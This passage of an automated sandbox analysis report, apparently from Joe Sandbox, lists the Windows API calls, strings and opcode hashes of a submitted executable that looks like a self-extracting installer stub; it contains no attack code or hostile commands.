                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                    • String ID:
                                                                    • API String ID: 2466489532-0
                                                                    • Opcode ID: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                                    • Instruction ID: 0ddf9739e914bca3a0fdf19f43e85ccaed600b4ac583c8006899e124ffc187c2
                                                                    • Opcode Fuzzy Hash: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                                    • Instruction Fuzzy Hash: 3C216572900609EFCB018FA5DD44A8EBFF4EF48364F20C4AAE419A72A0C335AA50DF40
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081D0
                                                                    • GetDlgItem.USER32(?,000004B8), ref: 004081EE
                                                                    • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00408200
                                                                    • wsprintfW.USER32 ref: 0040821E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 004082B6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                    • String ID: %d%%
                                                                    • API String ID: 3753976982-1518462796
                                                                    • Opcode ID: 1cca2f39a348a0152ebf7ec4c25e3beac73f54d8467528e78c91190636dc779a
                                                                    • Instruction ID: c98f75f04a9c9230d8836c9ffda7361431c24c45b39ddc8f7b463edf0082575f
                                                                    • Opcode Fuzzy Hash: 1cca2f39a348a0152ebf7ec4c25e3beac73f54d8467528e78c91190636dc779a
                                                                    • Instruction Fuzzy Hash: F7319171900704FBCB159F60DD45EDA7BB9FF48704F10806EFA46662E1CB75AA11CB68
                                                                    APIs
                                                                    • EndDialog.USER32(?,00000000), ref: 004083C7
                                                                    • KillTimer.USER32(?,00000001), ref: 004083D8
                                                                    • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408402
                                                                    • SuspendThread.KERNEL32(00000298), ref: 0040841B
                                                                    • ResumeThread.KERNEL32(00000298), ref: 00408438
                                                                    • EndDialog.USER32(?,00000000), ref: 0040845A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: DialogThreadTimer$KillResumeSuspend
                                                                    • String ID:
                                                                    • API String ID: 4151135813-0
                                                                    • Opcode ID: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                                    • Instruction ID: a6440e5942dbc82c6b0340cb4ae65663e5addf35b072ffdb2faf6fa56e3ea6cc
                                                                    • Opcode Fuzzy Hash: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                                    • Instruction Fuzzy Hash: 59119171200B09EFD7146F61EE94AAB3BADFB81B49704C03EF996A11A1DB355C10DA6C
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00404078
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?), ref: 004040B6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000), ref: 004040DC
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?), ref: 004040E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: %%M/$%%M\
                                                                    • API String ID: 613200358-4143866494
                                                                    • Opcode ID: bb3227fb540b56c9b80e14b3640dd96904c21d3d09cc897a6efbba85ef8fc945
                                                                    • Instruction ID: 0aef16b05ee34c363868bff67d8d58263bc671b78327bff7a9d128d2c4d1c409
                                                                    • Opcode Fuzzy Hash: bb3227fb540b56c9b80e14b3640dd96904c21d3d09cc897a6efbba85ef8fc945
                                                                    • Instruction Fuzzy Hash: AC11F935C0010AFADF05FFA1D993CED7B39AF10308F50812AB915721E1DB7866899B88
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403F02
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?), ref: 00403F40
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000), ref: 00403F66
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?), ref: 00403F6E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: %%T/$%%T\
                                                                    • API String ID: 613200358-2679640699
                                                                    • Opcode ID: 2d470cc8d94283252956d989b6689dc2ebbd5fd7352af1e53a5b04c2beeae0dc
                                                                    • Instruction ID: 8200ff4dc01eb7e5f3d0cd3b0db6b275db18d134b8f46633e684875e90eeb5b2
                                                                    • Opcode Fuzzy Hash: 2d470cc8d94283252956d989b6689dc2ebbd5fd7352af1e53a5b04c2beeae0dc
                                                                    • Instruction Fuzzy Hash: 7D11C935D00109FADF05FFA1D897CEDBB79AF10308F50812AB915721E1DB7856899B98
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403FBD
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?), ref: 00403FFB
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000), ref: 00404021
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?), ref: 00404029
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: %%S/$%%S\
                                                                    • API String ID: 613200358-358529586
                                                                    • Opcode ID: 7b4ece7d9f6b764ff1fa2c68a3db059a5987571cf6115451b9ca4ed44b585732
                                                                    • Instruction ID: ba471a5e309da56b19bd8a7b5a96c0f25c3cff1cb933eb2d3e2d1b68bec26358
                                                                    • Opcode Fuzzy Hash: 7b4ece7d9f6b764ff1fa2c68a3db059a5987571cf6115451b9ca4ed44b585732
                                                                    • Instruction Fuzzy Hash: 1811F935C00109FADF05FFA1D993CEE7B38AF10308F50812AB915721E1DB7856899B88
                                                                    APIs
                                                                    • _CxxThrowException.MSVCRT(00416CB4,00417010), ref: 0040D834
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionThrow
                                                                    • String ID: XkA$XkA$`lA$plA$xmA$xmA
                                                                    • API String ID: 432778473-1797977924
                                                                    • Opcode ID: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                                    • Instruction ID: 93ec62a24b9d8e66450440f0cc9ce576a4bb083ddd4f3a3c79e319c7eabf7869
                                                                    • Opcode Fuzzy Hash: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                                    • Instruction Fuzzy Hash: AB11D3B0601B008AC3308F169549587FBF8EF51758712CA1FD09A97A10D3F8E1888B99
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00419858,00000001,00419858,00419858,00000001,?,00000000), ref: 00405543
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055A5
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055BD
                                                                      • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                      • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                      • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                      • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                    • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                    • API String ID: 4038993085-372238525
                                                                    • Opcode ID: d3e9f328c178d1c37d8d2be3e420e2ffe5dfcc72685fcec157493962aa3a5304
                                                                    • Instruction ID: 9c73dee187ac7940ac785f0cdfe29d60513ad58ba118a45472d9fba9eb214e5e
                                                                    • Opcode Fuzzy Hash: d3e9f328c178d1c37d8d2be3e420e2ffe5dfcc72685fcec157493962aa3a5304
                                                                    • Instruction Fuzzy Hash: EA314871D0021AEACF01EF92CC569EEBB75FF58318F10402BE415722D1DB785645DB98
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: wsprintf$ExitProcesslstrcat
                                                                    • String ID: 0x%p
                                                                    • API String ID: 2530384128-1745605757
                                                                    • Opcode ID: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                                    • Instruction ID: 82a0a4c7c3cac984b025113f951df6a1ad0c5e072908762b67de37e2b53db34b
                                                                    • Opcode Fuzzy Hash: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                                    • Instruction Fuzzy Hash: A4114FB5800308EFDB20EFA4DD85ADBB3BCAF44304F54447BE645A3591D678AA84CF69
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00407DB6
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00407DCF
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 00407DEB
                                                                    • SHGetMalloc.SHELL32(00000000), ref: 00407E15
                                                                      • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                                      • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                    • String ID: A
                                                                    • API String ID: 1557639607-3554254475
                                                                    • Opcode ID: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                                    • Instruction ID: c991f1184b04d71a34ab75a046ed33f3991a90ed18c7befb8679fee52583d13b
                                                                    • Opcode Fuzzy Hash: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                                    • Instruction Fuzzy Hash: C3111F71A04208EBDB20DBA5C958BDE77BCAB84705F1400B9E905E7281DB78EE45CBB5
                                                                    APIs
                                                                    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402BA2
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402BAB
                                                                      • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                      • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                    • ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402BC3
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402BE3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                    • String ID: SetEnvironment
                                                                    • API String ID: 612612615-360490078
                                                                    • Opcode ID: 6fd92685c7c07524cb69523a0b3f88b0f5b66f8a7d46db0576145f2387c58a16
                                                                    • Instruction ID: 872148d7285510cba3beb976fe90dd67b0f7b9c7622c942f2c5d0e041fd95c9f
                                                                    • Opcode Fuzzy Hash: 6fd92685c7c07524cb69523a0b3f88b0f5b66f8a7d46db0576145f2387c58a16
                                                                    • Instruction Fuzzy Hash: 93015E72D00104BADB15ABA5ED81DEEB3BCAF44314B10416BF902B71D1DBB96A418AA8
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(004193C0,00000020,-00000002,-00000004,00405FF0,-00000002,?,?,00000000,0000000A), ref: 00404664
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404716
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040471E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040472D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404735
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$lstrlen
                                                                    • String ID:
                                                                    • API String ID: 2031685711-0
                                                                    • Opcode ID: 6bb2115abc2b7983059f506be08371e38299eabc65903dd6bc67c7965611ea45
                                                                    • Instruction ID: aeb94b40578403fee1b74b38ef18ad41e7f72b790eaa200ba48685626c4261d0
                                                                    • Opcode Fuzzy Hash: 6bb2115abc2b7983059f506be08371e38299eabc65903dd6bc67c7965611ea45
                                                                    • Instruction Fuzzy Hash: 6B214972D00104ABCF216FA0CC019EE77A8EF96355F10443BEA41B72E1F77E4D818648
                                                                    APIs
                                                                      • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000B), ref: 00407A93
                                                                      • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000C), ref: 00407A9C
                                                                    • GetSystemMetrics.USER32(00000007), ref: 004080B4
                                                                    • GetSystemMetrics.USER32(00000007), ref: 004080C5
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 0040818C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem$??3@
                                                                    • String ID: 100%%
                                                                    • API String ID: 2562992111-568723177
                                                                    • Opcode ID: c443a307be741d7f7ead550379958d9eb8597f0a20c174b700036d4b2d32541d
                                                                    • Instruction ID: 0c509f118c308a7c78e08742548c734dda8a0b47b1f593a1d30cecdc3777ed32
                                                                    • Opcode Fuzzy Hash: c443a307be741d7f7ead550379958d9eb8597f0a20c174b700036d4b2d32541d
                                                                    • Instruction Fuzzy Hash: CE31D471A007059FCB24DF65C9459AEB7F4EF40704B00052ED542A72D1DB74FD45CBA9
                                                                    APIs
                                                                      • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000010), ref: 00407CC9
                                                                      • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000011), ref: 00407CD7
                                                                    • wsprintfW.USER32 ref: 00404F19
                                                                    • ??3@YAXPAX@Z.MSVCRT(00405872,00000011,00405872,00000000,004166D0,?), ref: 00404F56
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem$??3@wsprintf
                                                                    • String ID: %X - %03X - %03X - %03X - %03X$xcA
                                                                    • API String ID: 1174869416-1550840741
                                                                    • Opcode ID: 28233daca7dc8c0aaef89f8cc8e472a8a905b5bdfe7962c42f7df5a404a7e39a
                                                                    • Instruction ID: 41466d8614d0a23c37c50aec3ef54a83e840c1df2718244856808616b3002f3b
                                                                    • Opcode Fuzzy Hash: 28233daca7dc8c0aaef89f8cc8e472a8a905b5bdfe7962c42f7df5a404a7e39a
                                                                    • Instruction Fuzzy Hash: F9117F71D44218ABDB15EB90DC56FEDB334BB10B08F10417EEA55361D2DBB86A44CB9C
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                                    • lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                                    • _wcsnicmp.MSVCRT ref: 0040423D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$_wcsnicmp
                                                                    • String ID: Mg@
                                                                    • API String ID: 2823567412-3680729969
                                                                    • Opcode ID: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                                    • Instruction ID: 9e1626592046255a92b3b8c2eb79444d9ed7104295bc7c238f4b93e2fb8c8d27
                                                                    • Opcode Fuzzy Hash: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                                    • Instruction Fuzzy Hash: 09E026726042019BC700CBA5ED84C8B7BECEAC8790B00087BF700E3011E334D8148BB5
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                    • API String ID: 2574300362-3900151262
                                                                    • Opcode ID: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                                    • Instruction ID: 50d9489a907287b4f58dec005f8c8a71b0fe89906bae8f062ddf8536b40cf8c2
                                                                    • Opcode Fuzzy Hash: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                                    • Instruction Fuzzy Hash: C3D0C970A91700FBDB511FA0EE2DBD636A6EB80B0BF448436E812A00F0C7FC4884CA1C
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040243F,?,004069D7,?,00000000,?,?), ref: 004023FA
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00402401
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
